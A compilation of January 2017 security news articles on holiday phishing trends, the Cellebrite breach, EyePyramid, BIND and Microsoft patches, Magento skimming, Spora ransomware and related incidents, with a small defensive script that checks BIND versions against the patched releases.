As evidenced in our original analysis of the threat landscape during the holiday period in 2014 and 2015, criminals were trying to tie their phishing campaigns to certain dates which resulted in a visible increase in the number of attacks during the Black Friday, Cyber Monday and also Christmas periods. The 2016 figures showed no difference but we’ve seen an increase in the number of attacks which utilized well-known brands from the online retail and financial industries.

[Graph: detections of Amazon-themed phishing scams around Black Friday and Cyber Monday 2016]

As seen on the graph above, the spikes of detections of Amazon-themed phishing scams matched the dates of Black Friday and Cyber Monday 2016 almost perfectly. The same dynamics are repeated with some other topical brands including payment systems.

[Graph: the same dynamics for other topical brands, including payment systems]

Interestingly, the dynamics during the Christmas period are different. As seen below, the number of attacks started decreasing several days prior to Christmas Eve, and then went up on 25th December.

[Graphs: phishing detections around the Christmas 2016 period]

Such synchronous behavior could be explained by multiple factors, one of which is that cybercriminals are also celebrating Christmas and that the overall number of web users also decreases on 24th December. But on 25th December, the number of attacks goes back up.

Scams: from Black Friday to Christmas-themed

In our initial report, we examined some examples of so-called topical phishing scams dedicated to a specific topic – the Black Friday sales. While the report was published several weeks before the actual sales started, we already identified some examples of Black Friday-themed phishing scams. Closer to the start of the sales some new examples appeared.

[Screenshot]

Example of a Black Friday-themed phishing scam offering a smartphone with 65% discount.

[Screenshot]

Example of a Black Friday-themed phishing scam offering a TV for an attractive price.

The scams mostly promoted personal electronics, like smartphones and TVs, at extremely low prices, and tried to lure users into providing payment information to criminals. With Christmas approaching, the topics of scams changed accordingly. In December, our researchers started to detect Christmas and New Year-themed phishing schemes.

[Screenshot]

Example of a Christmas-themed phishing scam resembling the Alibaba.com e-shop.

The example on the screen shot above doesn’t look Christmas-themed at first glance. However this fake Alibaba.com website was available on the christmascartoons.org URL and was supposed to attract victims with a tempting offer to get a loan with very low interest, along with the ability to search for goods and buy them from the same page using a credit card.

In another example targeting mobile users, criminals tried to exploit the popularity of the Clash of Clans mobile game.

[Screenshot: Clash of Clans-themed New Year giveaway scam]

The scam promises that the developers of the game are giving away some valuable in-game virtual items for free, as a New Year present to fans.

[Screenshot: selection of in-game items offered by the scam]

Users can choose from a range of items; however, in order to receive these gifts, they need to fill in a registration form which requests their Gmail account details.

[Screenshot: registration form requesting Gmail account details]

Needless to say, in exchange for this information, the victim receives nothing but a loss of control over their email account and the confirmation email.

[Screenshot: confirmation e-mail sent to the victim]

But the latter is only sent so criminals could be sure that the credentials provided by the victim are legitimate.

In general, we can’t say that the holiday period in 2016 has seen an unusually high increase of phishing attacks, however, our major hypothesis, stated in previous reports – that criminals would exploit Black Friday and Christmas topics and dates – has been confirmed.

And of course, financial phishing wasn’t the only type of cyberthreat that behaved unusually in the last three months of 2016. The financial malware landscape also showed some interesting changes.

Financial malware attacks

In total, during Q4 2016 Kaspersky Lab registered attacks with financial malware against 319,692 users worldwide. That is 22.49% more than during the same period in 2015, when 261,000 users were attacked, and 2.7% more than in 2014. It is hard to say if such an increase has been provoked by criminal interest in the holiday season; however, data on the dynamics of attacks shows that just like phishing scammers, financial malware operators tried to connect their activity to particular dates.

[Graph]

Dynamics of attacks with financial malware during Q4 2016 (holiday period)

25th November 2016 (Black Friday) saw a modest, but visible spike in attacks, with another on 28th November (Cyber Monday). In all, November became the second hottest month of the period in terms of number of attacked users: with more than 120 000. The hottest was October, with more than 130 000 attacked users.

[Graph]

Dynamics of attacks with financial malware during Black Friday and Cyber Monday 2016

The activity of attackers during the Christmas period showed a different pattern. A major increase happened before (on December 22nd) and after (from 25 – 27th December). This may be explained by the fact that most e-commerce activities happen around these dates: people buy gifts and goods for Christmas and the New Year, travel for vacations and spend money on entertainment.

[Graph]

Dynamics of attacks with financial malware during the Christmas 2016 period

It is also important to note that the dynamics of attacks during the holidays are very similar to what we have already seen in 2015 and 2014. Criminals are eager to get users’ money and the holiday period is a key time for them.

To reach their goals they use one of 30 families of banking trojans of which five are the most widespread: Zbot, Nymaim, Shiotob, Gozi and Neurevt. These five are responsible for attacks against 92.35% of users in the period.

[Graph]

The share of users attacked with Top 5 banking trojans


It looks like the trends we spotted as part of our analysis of the threat landscape during the holiday period in 2014 and 2015 have repeated in 2016, but on a larger scale, with more users being attacked. It is too early to draw conclusions on how successful fraud campaigns during the 2016 holiday season were, because usually criminals who were able to steal credentials to payment cards don’t cash them in immediately. They wait for several months in order to make fraudulent transactions less suspicious to the anti-fraud systems of financial organizations, but it would be safe to say that there were multiple attempts to exploit the high sales season.

Although the holiday season is over, it is still imperative to keep in mind several simple rules to stay safe when carrying out financial operations online. Steps to follow can be found in our initial report about holiday threats.

Phone-Hacking Firm Cellebrite Got Hacked; 900GB Of Data Stolen
13.1.2017 thehackernews Mobil
Cellebrite Got Hacked
The company that sells digital forensics and mobile hacking tools to others has itself been hacked.
Israeli firm Cellebrite, the popular company that provides digital forensics tools and software to help law enforcement access mobile phones in investigations, has had 900 GB of its data stolen by an unknown hacker.
But the hacker has not yet publicly released anything from the stolen data archive, which includes its customer information, user databases, and a massive amount of technical data regarding its hacking tools and products.
Instead, the attacker is looking for opportunities to sell access to Cellebrite's systems and data in a few selected IRC chat rooms, the hacker told Joseph Cox, a contributor at Motherboard, who was contacted by the hacker and received a copy of the stolen data.
Meanwhile, Cellebrite also admitted that it recently experienced "unauthorized access to an external web server," and said that it is "conducting an investigation to determine the extent of the breach. The impacted server included a legacy database backup of my.Cellebrite, the company's end user license management system."
The 900 GB of stolen archive also includes login data (usernames and passwords) of Cellebrite customers, which suggests that it has been taken from the web servers related to Cellebrite's site.
The dump also contains "evidence files from seized mobile phones, and logs from Cellebrite devices," and it appears that the company has sold phone hacking tools to repressive regimes, such as Turkey, the United Arab Emirates, and Russia.
On the other hand, the hacker did not clearly state the actual extent of what he/she had done to Cellebrite's systems.
"I can't say too much about what has been done," the hacker told Motherboard. "It's one thing to slap them, it's a very different thing to take pictures of [their] balls hanging out."
Cellebrite is known for its powerful hacking tool Universal Forensic Extraction Device (UFED), which helps investigators bypass the security mechanisms of mobile phones, especially iPhones, and extract all data from them, including SMS messages, emails, call logs and passwords.
Just a few months back, Cellebrite's most sensitive in-house capabilities were made public by one of its products' resellers, who distributed copies of Cellebrite's firmware and software for anyone to download.

Two observations about the Italian EyePyramid espionage campaign
13.1.2017 securityaffairs
Let’s try to analyze some facts about the Italian EyePyramid espionage campaign. Prof. Corrado Aaron Visaggio helped us in this difficult task.
The Italian EyePyramid espionage campaign raised two simple questions for me:

(i) Are the criminals geniuses or dummies?

(ii) How can an old, known, easy-to-detect malware infect so many machines belonging to different perimeters for so long, but only in Italy?

This cyber-espionage appears as a naive mixture of sophisticated and amateur techniques. The choice of the spyware (amateur) is the first strange thing: EyePyramid is an old and known malware.

Kaspersky reported that its products had blocked more than 90 EyePyramid infection attempts. While 80 percent of these attempts were spotted in Italy, the malware was also detected in France, Indonesia, Monaco, Mexico, China, Taiwan, Germany and Poland.

Kaspersky says the malware is not sophisticated and not difficult to detect. The company also pointed out that the attackers had poor operational security (OPSEC) as they failed to hide their real IP addresses when launching attacks, and they used regular phone calls and WhatsApp to discuss their activities.

“In general, the operation had very poor OPSEC (operational security); the suspects used IP addresses associated with their company in the attacks, discussed the victims using regular phone calls and through WhatsApp and, when caught, attempted to delete all the evidence.”

“This indicates they weren’t experts in the field but merely amateurs, who nevertheless succeeded in stealing considerably large amounts of data from their victims. As seen from other known cyberespionage operations, it’s not necessary for the attackers to use high profile malware, rootkits, or zero-days to run long-standing cyberespionage operations.” reads the analysis published by Kaspersky on EyePyramid.

The final victims were infected by emails sent by compromised accounts belonging to several attorneys and associates in several law firms (sophisticated) but data was exfiltrated as attached to emails sent to a small set of e-mail addresses (amateur).

The malware was a customized (sophisticated) version of a very old malware (about 1995) (Amateur), with a weak obfuscation (amateur), but that makes use of reflection (sophisticated).

The malware was updated throughout the duration of the espionage (likely 4-6 years) in order to make it evasive to detection and to add more advanced spying functions, like intercepting the typing of specific words (sophisticated), but the stolen data resided on a couple of servers regularly and directly accessed by the supposed authors of the espionage (amateur).

It is interesting to note that the purchase of a paid library led the authorities to the identity of the persons behind the campaign (amateur), since the cyber criminals used a licensed library, MailBee.Net, which they regularly paid for, to send the exfiltrated data out to dropzones.

Are these criminals geniuses or dummies?

The second observation regards some concerns about “how” such software can stay resident for years on so many machines placed within several different perimeters that are supposed to be protected and monitored.

Concern number 1: is it really so easy to infect the machines of key people of a Nation’s Government (and further equally important Institutions and Organizations), with a very old and unsophisticated malware?

Concern number 2: the malware remained active for several years and the attackers were able to update it in order to evade detection: did the attackers know how the operating environment of the victims changed over time, and did they adapt the malware accordingly?

Concern number 3: C&C infrastructure usually makes use of fluxing techniques (for IPs or domains) to hide itself. In this case, the dropzones were a small number of domains or e-mail addresses, so exfiltrated data was sent continuously to a fixed and small set of dropzones. How could this activity (easy to classify as an anomaly) pass unnoticed by a monitoring system for such a long time?

Concern number 4: if the malware was easy to detect, as claimed by Kaspersky, why did it remain undetected on so many machines, in different perimeters, for such a long time?



The ISC issued updates for 4 High severity DoS flaws in BIND
13.1.2017 securityaffairs
The Internet Systems Consortium (ISC) has issued security updates to address four high severity flaws in the DNS software BIND.
The Internet Systems Consortium (ISC) has issued updates to solve four high severity flaws in the DNS software BIND. The flaws could be exploited by a remote attacker to cause a DoS condition.

An attacker can exploit the vulnerabilities to cause the BIND name server process to encounter an assertion failure and stop executing. The Internet Systems Consortium confirmed that it is not aware of active exploits for the flaws.


Below is the list of flaws provided by the ISC:

CVE-2016-9778: An error in handling certain queries can cause an assertion failure when a server is using the nxdomain-redirect feature to cover a zone for which it is also providing authoritative service. A vulnerable server could be intentionally stopped by an attacker if it was using a configuration that met the criteria for the vulnerability and if the attacker could cause it to accept a query that possessed the required attributes.
CVE-2016-9147: Depending on the type of query and the EDNS options in the query they receive, DNSSEC-enabled authoritative servers are expected to include RRSIG and other RRsets in their responses to recursive servers. DNSSEC-validating servers will also make specific queries for DS and other RRsets. Whether DNSSEC-validating or not, an error in processing malformed query responses that contain DNSSEC-related RRsets that are inconsistent with other RRsets in the same query response can trigger an assertion failure. Although the combination of properties which triggers the assertion should not occur in normal traffic, it is potentially possible for the assertion to be triggered deliberately by an attacker sending a specially-constructed answer.
CVE-2016-9131: A malformed query response received by a recursive server in response to a query of RTYPE ANY could trigger an assertion failure while named is attempting to add the RRs in the query response to the cache. While the combination of properties which triggers the assertion should not occur in normal traffic, it is potentially possible for the assertion to be triggered deliberately by an attacker sending a specially-constructed answer having the required properties, after having engineered a scenario whereby an ANY query is sent to the recursive server for the target QNAME. A recursive server will itself only send a query of type ANY if it receives a client query of type ANY for a QNAME for which it has no RRsets at all in cache, otherwise it will respond to the client with the RRsets that it has available.
CVE-2016-9444: An unusually-formed answer containing a DS resource record could trigger an assertion failure. While the combination of properties which triggers the assertion should not occur in normal traffic, it is potentially possible for the assertion to be triggered deliberately by an attacker sending a specially-constructed answer having the required properties.
The CVE-2016-9778 flaw affects only a subset of servers which are performing NXDOMAIN redirection using the “nxdomain-redirect” function.

The CVE-2016-9131, the CVE-2016-9147, and the CVE-2016-9444 flaws occur during the processing of an answer packet received in response to a query.

“As a result, recursive servers are at the greatest risk; authoritative servers are at risk only to the extent that they perform a limited set of queries (for example, in order to do zone service)” state the advisories for the flaws.

The BIND versions 9.9.9-P5, 9.10.4-P5, 9.11.0-P2 and 9.9.9-S7 address the above vulnerabilities.
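An operator with many resolvers will want a quick way to tell which hosts still need the update. The Python below is an added example for this page (not ISC's code): it parses the version string that `named -v` prints (or that an inventory system records) and compares it with the fixed releases named above, treating the 9.9.9-P5 and 9.9.9-S7 lines as two editions of the same branch. The sample strings are constructed. One caveat worth keeping in mind: distributions that backport fixes leave the upstream version string unchanged, so for packaged BIND the package changelog, not this check, is authoritative.

```python
import re

# Fixed releases named in the ISC advisories quoted above, keyed by release branch.
# The 9.9 branch ships two editions: the open-source "-P" line and the subscription "-S" line.
FIXED = {
    (9, 9):  {"base": (9, 9, 9),  "P": 5, "S": 7},
    (9, 10): {"base": (9, 10, 4), "P": 5},
    (9, 11): {"base": (9, 11, 0), "P": 2},
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-([PS])(\d+))?")


def parse_bind_version(text: str):
    """Extract (major, minor, patch, edition, level) from text such as 'BIND 9.10.4-P3'."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    edition = m.group(4)                          # "P", "S" or None
    level = int(m.group(5)) if m.group(5) else 0  # the number after -P / -S
    return (major, minor, patch, edition, level)


def assess(text: str) -> str:
    """Classify a BIND version string as 'fixed', 'vulnerable' or 'unknown'.

    'unknown' covers branches the advisories do not list and unparseable input;
    both deserve a manual look rather than a green tick.
    """
    parsed = parse_bind_version(text)
    if parsed is None:
        return "unknown"
    major, minor, patch, edition, level = parsed
    branch = FIXED.get((major, minor))
    if branch is None:
        return "unknown"
    base = (major, minor, patch)
    if base < branch["base"]:
        return "vulnerable"              # older point release of a listed branch
    if base > branch["base"]:
        return "fixed"                   # later point release than the fix
    if edition is None:
        return "vulnerable"              # the base release without any patch level
    required = branch.get(edition)
    if required is None:
        return "unknown"                 # edition not listed for this branch
    return "fixed" if level >= required else "vulnerable"


# Constructed inventory entries (hostname -> version string), not real hosts.
INVENTORY = {
    "resolver-1": "BIND 9.10.4-P3",
    "resolver-2": "BIND 9.10.4-P5",
    "auth-1": "BIND 9.11.0-P2",
    "legacy-1": "BIND 9.9.9-S6",
}

if __name__ == "__main__":
    for host, version in INVENTORY.items():
        print(host, version, "->", assess(version))
```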

Israeli mobile phone data extraction company Cellebrite was hacked
13.1.2017 securityaffairs Mobil
The Israeli mobile phone data extraction company Cellebrite was hacked by unknown hackers, who provided the 900GB database to Motherboard.
In an irony of fate, the Israeli mobile phone data extraction company Cellebrite was hacked. The company made the headlines in the dispute between Apple and the FBI over the San Bernardino shooter’s iPhone.

On Thursday, Vice Motherboard reported that an unnamed hacker contacted it to provide the 900GB database belonging to Cellebrite. Basic contact information for users registered to receive notifications from the firm was exposed, along with hashed passwords and technical data regarding Cellebrite’s products.

The company’s main product is the Universal Forensic Extraction Device (UFED), equipment that can extract data (e.g. SMS messages, emails, call logs) from a huge number of different mobile phone models.

Cellebrite issued a statement to inform its customers of the data breach that affected an “external web server” containing the company’s license management system. An unauthorized third party broke into the company’s systems.

According to the firm, the hackers accessed a legacy archive that is no longer in use because the company has migrated to a new system.


The Israeli firm has advised all its customers to change their passwords.

“Cellebrite recently experienced unauthorized access to an external web server. The company is conducting an investigation to determine the extent of the breach. The impacted server included a legacy database backup of my.Cellebrite, the company’s end user license management system.” states the statement issued by the company.

Motherboard verified the email addresses in the archive by attempting to create accounts on the company portal.

“In the majority of cases, this was not possible because the email address was already in use. A customer included in the data confirmed some of their details.”

The hack revealed an uncomfortable truth: Cellebrite also works with states that have questionable human rights records.

“In addition, the trove of materials contains “customer support tickets” showing that the Israeli company sells its services to countries with questionable human rights records, including Turkey, Russia, and the United Arab Emirates.” reported Ars.

Thousands of unpatched Magento shops hacked in the last two years
12.1.2017 securityaffairs Hacking

According to the BSI, more than 6,000 online stores running eBay’s Magento platform have been hacked over the last two years.
According to Germany’s Federal Office for Information Security, more than 6,000 online stores running eBay’s Magento platform have been hacked over the last two years. Crooks targeted the e-commerce platform in order to steal credit card data, injecting carding malware into unpatched Magento e-shops.

Germany’s Federal Office for Information Security confirmed that roughly 1,000 of the online stores are in Germany; it did not provide information on the overall amount of stolen data.

“The Federal Office for Information Security (BSI) has received information according to which currently at least 1,000 German online shops are affected by online skimming. Here cyber criminals use vulnerabilities in outdated versions of shop software to inject malicious code. This then skims the customer’s payment information during the ordering process and sends it to the perpetrators. Affected are online shops that are based on the widely used software Magento.” reads the translation of the advisory issued by BSI. “The infected code and the associated data flow is usually not visible to users. The BSI is currently not aware of the extent of the payment data already passed through these attacks.”

The Federal Office reported the attacks to the victims, but many of them failed to fix the issue. The security expert Willem de Groot first reported carding attacks against unpatched Magento shops in October. The Dutch expert analyzed a cyber attack against the website belonging to the National Republican Senatorial Committee, which allowed people to make donations. According to de Groot, who analyzed the traffic on the platform, hackers accessed data related to roughly 3,500 transactions per month between March 16 and October 5, 2016.

Card data was sent to Russian IP addresses; the expert estimated that some 21,000 credit cards had been stolen at the time.

At the time, de Groot estimated that the attacks against Magento shops had compromised some 6,000 sites over 18 months. The expert also published a free vulnerability scanning service that operators of Magento shops can use to check their websites.

It is not clear whether the same threat actors are behind all of the attacks against the unpatched Magento shops.

The BSI has now tried again to warn operators of the Magento shops that were compromised. Unfortunately, once again many operators failed to apply the security measures necessary to protect their e-commerce platform.

“Unfortunately, there are still indicators that many operators have been negligent in securing their online stores,” said the BSI president Arne Schönbohm.

“A variety of shops are running outdated software versions which contain several known vulnerabilities. Operators must fulfill their customer responsibilities and ensure their services are fixed quickly and consistently.”

“The BSI points out at this juncture that the obligation to secure systems applies not only to companies but also to all other business-like operators of websites. This includes, for example, websites of private individuals or associations, if their operation is intended to generate revenue permanently. This is already assumed when advertising banners are placed on websites,” states the BSI. “Customers and operators of online shops based on Magento can use the free service MageReport to check whether their shop system has known vulnerabilities and is affected by the current attacks.”

Spora Ransomware allows victims to pay for immunity from future attacks
12.1.2017 securityaffairs

Security experts from Emsisoft spotted a new strain of malware, the Spora ransomware, that allows potential victims to pay for immunity from future attacks.
Security experts from Emsisoft have spotted a new strain of ransomware dubbed Spora that implements an unusual extortion model: it allows victims to pay for immunity from future attacks.
According to the experts, Spora appears well written; it has a professional-looking payment website and offers victims several options, from recovering their files to removing the malware to buying immunity from future attacks.

Spora ransomware

The Spora ransomware implements a unique pricing model to determine how much a victim has to pay.

The attack vector is email: victims receive messages with fake invoices attached. The attachments are ZIP archives containing an HTA (HTML Application) file masquerading as a PDF or DOC. When the victim runs the file, it drops a JScript file in the %TEMP% folder, writes an encoded script into it, and executes it.

The malware encrypts files stored on both local drives and network shares and does not append an extension to them. Spora skips files in specific directories so as not to break the machine's operation.

According to Emsisoft, the ransomware leverages the Windows CryptoAPI for encryption, using a combination of RSA and AES to encrypt the files.

The encryption key management is quite complex as explained in the post published by the security firm.

“When Spora arrives on a system, it will first find and decrypt the malware author’s public RSA key embedded inside the malware executable using a hard-coded AES key. Once the malware author’s public RSA key has been successfully imported, the malware continues by creating a new 1024 bit RSA key pair, which we will call the victim’s RSA key pair, consisting of both a private and public key. It will also generate a new 256 bit AES key to encrypt the victim’s private RSA key with. Once the victim’s private RSA key is encrypted, the AES key used is then encrypted using the malware author’s public RSA key. The encrypted key material together with some additional information is then saved inside the .KEY file.” states the analysis published by Emsisoft.

“To encrypt a document or file on the system, Spora will first generate a new 256 bit per-file AES key. This per-file key serves to encrypt up to the first 5 MB of the file. Once done, the malware will encrypt the per-file key using the victim’s public RSA key and the RSA-encrypted per-file key is appended to the encrypted file.”

One of the most interesting abilities of the malware is that it can encrypt files without any connection to a command and control (C&C) server. And even if a security firm obtains a decryption tool built for one victim, it will not be able to decrypt the files of other victims.

Experts believe Spora is sold as ransomware-as-a-service, because the samples they analyzed contain a hardcoded identifier that is likely used to track a specific campaign.

The aforementioned .KEY file also contains information such as the infection date, the victim's username, and the locale of the infected system. The Spora operators use this information to determine the ransom amount.

In 2016, these are the four ways bots altered history
12.1.2017 securityaffairs

2016 was the biggest year by far for all sorts of bots. From Chatbots to bad bots, the past year was eventful to say the least.
The year saw more than 980 cyber security breaches across online businesses, with 35 million accounts exposed; Yahoo! alone disclosed in 2016 that more than 1 billion accounts had been stolen. $400 billion was reportedly lost to cyber attacks across all industries this year, and on this trend the losses are projected to reach around $2.1 trillion by 2019.

Now, let’s look at the top 4 bot incidents that altered history in 2016.

Mirai bots

Dyn cyberattack (Mirai): The Dyn cyberattack took place on October 21st, 2016 and was carried out with a malware known as Mirai. Mirai (Japanese for “the future”) is malicious software that turned Internet of Things (IoT) devices into bots, which were then used in the record-breaking attack. Since 2010, the number of devices connected to the internet has doubled from 12.5 billion to 25 billion. Mirai worked by identifying IoT devices that still used default usernames and passwords and planting itself on them. Once turned, the bots acting in tandem were able to produce attacks of over 1.2 terabits per second. Major websites such as Amazon.com, Netflix, CNN and the BBC were taken down by the bad bots. It is by far the biggest attack of its kind on the open internet, and a case in point for what an attack on a DNS provider means for every service whose name resolution depends on it.
Bots used to influence the public: Social media bots were the most active bots of 2016 and, with major events such as Brexit and the US elections, the most influential.
Brexit: Automated social media accounts created by both sides of the debate were meant to have a massive influence on the referendum vote, especially on the last-minute ‘undecideds’. Researchers from Oxford University found that bots played a strategic role during the debate, circulating ‘repetitive’ political content to shape public opinion. The bots’ job was simple: tweet pro- or anti-Brexit messages over and over again, or retweet and share messages from influencers on either side. This kept the desired message alive on the platforms far longer than it would otherwise have been.

US elections: According to Twitter Audit, almost 40% of Donald Trump’s Twitter followers were inactive, fake or spam accounts, while for Hillary Clinton the figure was around 37%. That adds up to more than 7 million fake or inactive bot accounts circulating messages across the globe. These accounts propagated messages for both candidates and heavily influenced the undecided voter.

At first glance, the impact of Twitter, Facebook and other social media might not be considered a serious threat. But the propaganda spread by bots is routinely encountered by journalists who use social media; journalists in turn read these bot-propagated messages as a trend among people and report on them, which amplifies the influence of such bots even further. It is remarkable how bots could influence the course of history for two major nations last year, and it is just the beginning. German Chancellor Angela Merkel’s concern that bots could manipulate the upcoming German elections is not unfounded.

The rise of chatbots: 2016 is considered the year of the chatbot, with every major e-commerce company and service provider producing one. Early 2016 started a race among companies to build chatbots, which are widely regarded as the new automated intelligence trend. These bots are created to interact with users to provide information or execute simple tasks.
Good chatbots went bad: When Microsoft launched Tay (an AI Twitter chatbot) on March 23, 2016, it was the start of a new era. Tay was programmed to learn from its interactions with real users on Twitter, but within a few hours it had become a vulgar, racist bot. Microsoft took it down within 16 hours; by then Tay had tweeted 96,000 times.

BOTS Act passed by the US Senate (ticket scalping bots): Ticket scalping bots were made illegal in the US in December 2016, when President Obama signed the BOTS (Better Online Ticket Sales) Act of 2016. The significance of the bill is that any software or automated bot program used to scalp tickets is now illegal, making bot-driven ticket scalping a federal offense. Ticket scalping was brought to light this year by Lin-Manuel Miranda, star of the Broadway show Hamilton, whose tickets were bought up by bots and resold at a higher price on other websites. With the help of senators and the mainstream media, Congress passed the bill. Ticket scalping bots are notorious for buying out thousands of tickets within seconds, which frustrates genuine users visiting the site and, in the long run, hurts the producers as well.
According to the popular online ticket seller Ticketmaster, in 2016 bots tried to buy 5 billion tickets on its website, or 10,000 a minute, resulting in 60% of the tickets being scalped by bots.

With the surge in malicious bots, there is a need to stop them before they can harm your online business. Bots have become increasingly malicious and damaging for all online businesses.

So, have you thought about how your online business may be silently targeted by bad bots? How is your 2017 IT roadmap poised to address bot threats?

Browser AutoFill Feature Can Leak Your Personal Information to Hackers
11.1.2017 thehackernews Hacking
Hackers Can Steal Your Personal Information, Thanks to Browser AutoFill Feature
Just like most of you, I too really hate filling out web forms, especially on mobile devices.
To make this process faster, Google Chrome and other major browsers offer an "Autofill" feature that automatically fills out web forms based on data you have previously entered in similar fields.
However, it turns out that an attacker can use this autofill feature against you and trick you into spilling your private information to hackers or malicious third parties.
Finnish web developer and whitehat hacker Viljami Kuosmanen published a demo on GitHub that shows how an attacker could take advantage of the autofill feature provided by most browsers, plugins, and tools such as password managers.
The proof-of-concept website consists of a simple web form with just two visible fields: Name and Email. What is not visible are several hidden (out-of-sight) fields, including phone number, organization, address, postal code, city, and country.
Giving away all your Personal Information Unknowingly

So, if users with an autofill profile configured in their browser fill out this simple form and click the submit button, they send all the fields, unaware that the six fields hidden from them but present on the page were also filled in and sent to the phishers.
You can also test your browser and extension autofill feature using Kuosmanen's PoC site.
Kuosmanen could make this attack even worse by adding more hidden personal fields, including the user's address, credit card number, expiration date, and CVV, although auto-filling financial data triggers a warning in Chrome when the site does not use HTTPS.
Kuosmanen's attack works against a variety of major browsers and autofill tools, including Google Chrome, Apple Safari, Opera, and even the popular password manager LastPass.

Mozilla's Firefox users do not need to worry about this particular attack, as the browser currently does not have a multi-box autofill system and makes users select the pre-fill data for each box manually.
Therefore, the Firefox browser can't be tricked into filling text boxes by programmatic means, Mozilla principal security engineer Daniel Veditz says.
Here's How to Turn Autofill Feature Off
The simplest way to protect yourself against such phishing attacks is to disable form autofill feature in your browser, password manager or extension settings.
The autofill feature is turned on by default. Here's how to turn it off in Chrome:
Go to Settings → Show Advanced Settings at the bottom, and under the Passwords and Forms section uncheck Enable Autofill box to fill out web forms with a single click.
In Opera, go to Settings → Autofill and turn it off.
In Safari, go to Preferences and click on AutoFill to turn it off.

Microsoft Releases 4 Security Updates — Smallest Patch Tuesday Ever!
11.1.2017 thehackernews

Microsoft has issued its first Patch Tuesday for 2017, and it is one of the smallest monthly patch releases the company has ever shipped, with only four security bulletins addressing vulnerabilities in its Windows operating system and in Adobe Flash Player.
Meanwhile, Adobe has also released patches for more than three dozen security vulnerabilities in its Flash Player and Acrobat/Reader for Windows, MacOS, and Linux desktops.
According to Microsoft's advisory, only one security bulletin is rated critical, while the other three are rated important. The bulletins address vulnerabilities in Windows, Windows Server, Office, Edge and Flash Player.
The only bulletin rated critical is the one dedicated to Adobe Flash Player, for which Microsoft distributes patches through Windows Update. The bulletins addressing flaws in Microsoft's own products are as follows:
Bulletin 1 — MS17-001
This security update resolves just one vulnerability in the Microsoft Edge browser. Microsoft rates this bulletin as important.
The vulnerability (CVE-2017-0002) could let an attacker gain elevated access privileges by tricking users to view a specially crafted web page using Microsoft Edge.
This elevation of privilege flaw exists in Microsoft Edge's cross-domain policies, which could allow "an attacker to access information from one domain and inject it into another domain," Microsoft says.
The update will be rolled out to Windows 10 and Server 2016.
Bulletin 2 — MS17-002
This bulletin likewise patches a single vulnerability, this time in Microsoft Office.
The vulnerability, designated CVE-2017-0003, is a memory corruption issue that allows an attacker to perform remote code execution (RCE) in Microsoft Office 2016 and SharePoint Enterprise Server 2016.
The flaw lets a specially crafted Word file take control of the target machine with the current user's privileges.
Users whose accounts have fewer rights on the system are less affected than users who operate with administrative rights, such as some home accounts and server users.
Bulletin 3 — MS17-003
This security bulletin is rated as Critical and resolves 12 security vulnerabilities in Adobe Flash Player for all supported editions of Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, Windows 10, and Windows Server 2016.
The security patch will be automatically rolled out to Windows users running Microsoft Edge or Internet Explorer 11.
Bulletin 4 — MS17-004
This security update, also rated important, addresses a single denial of service (DoS) vulnerability in the Local Security Authority Subsystem Service (LSASS) on Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
The flaw (CVE-2017-0004) resides in the LSASS component that handles authentication requests and could be exploited to reboot the system by sending a specially crafted authentication request to the targeted system or server.
Adobe Security Patch Update
A total of 13 vulnerabilities have been addressed in Flash Player; none of the flaws is known to have been exploited in the wild.
The Flash Player updates for both Windows and macOS are rated critical, as successful exploitation of the vulnerabilities could let an attacker execute code remotely on the target system. Linux users are at lower risk of attack.
The update for Adobe Acrobat and Reader addresses some 29 flaws, including some remote code execution (RCE) vulnerabilities in both Windows and macOS.
Users and IT administrators are strongly advised to apply the Windows and Adobe patches as soon as possible to keep hackers and cybercriminals from taking control of their computers.
A system reboot is necessary to install the updates, so users should save their work before starting the process on PCs where the whole package of patches is deployed.

Juniper SRX firewalls open a root-level account due to a flaw
11.1.2017 securityaffairs

Juniper has discovered that a failed software update on its SRX firewalls can leave a root-level account open on the network device.
The company has started warning its users: every user who issued the “request system software” command with the “partition” option is affected by the issue. A failed system upgrade leaves the device in a state where root CLI login is allowed without a password. The problem affects SRX devices upgraded to a Junos OS 12.1X46 release prior to 12.1X46-D65. When the upgrade fails, the system falls back to a “safe mode” designed to let a sysadmin get in and fix the problem.

This implies that a root login without a password is available.

“Using the ‘request system software’ command with the ‘partition’ option on an SRX Series device upgrading from Junos OS releases prior to 12.1X46-D65 can leave the system in a state where root CLI login is allowed without a password due to the system reverting to a “safe mode” authentication triggered by the failed upgrade. Additionally, valid authentication credentials fail to work due to the same issue. Only root with no password will work,” reads a security advisory published by Juniper.

According to the security advisory published by Juniper, no other platform or version of Junos OS is affected by the vulnerability. It also confirmed that no other Juniper Networks products or platforms are affected.

The experts highlighted that every other previously valid authentication credential stops working on the affected device; only root with no password is accepted.

To definitively solve the problem, upgrade the affected SRX Series device from the affected release to a fixed release.

Juniper SIRT confirmed that it is not aware of any malicious exploitation of this vulnerability.

“Avoid using the ‘partition’ option when upgrading an SRX Series device to Junos OS 12.1X46 prior to 12.1X46-D65,” continues the advisory. “Note that the symptoms are immediately obvious after an affected upgrade and may be remediated by rebooting the device post-upgrade.”

This means that simply rebooting the device after the failed upgrade clears the passwordless root login.

The issue is tracked as CVE-2016-1278.

Stolen NSA "Windows Hacking Tools" Now Up For Sale!
11.1.2017 thehackernews BigBrothers
The Shadow Brokers who previously stole and leaked a portion of the NSA hacking tools and exploits is back with a Bang!
The hacking group is now selling another package of hacking tools, “Equation Group Windows Warez,” which includes Windows exploits and antivirus bypass tools stolen from the NSA-linked hacking unit, the Equation Group.
For those unfamiliar with the topic, The Shadow Brokers is a notorious group of black-hat hackers who, in August 2016, leaked exploits, security vulnerabilities, and "powerful espionage tools" created by The Equation Group.

On Saturday, the Shadow Brokers posted a message on their ZeroNet based website, announcing the sale of the entire "Windows Warez" collection for 750 Bitcoin (around US$678,630).
The data dump contains many Windows hacking tools, categorized as follows:
Fuzzing tools (used to discover errors and security loopholes)
Exploit Framework
Network Implants
Remote Administration Tools (RAT)
Remote Code Execution Exploits for IIS, RDP, RPC, SMB Protocols (Some Zero-Days)
SMB BackDoor (Implant)
Interestingly, the Remote Administration Tool (RAT) "DanderSpritz" included in the list is the one previously leaked in the NSA's documents revealed by Edward Snowden.

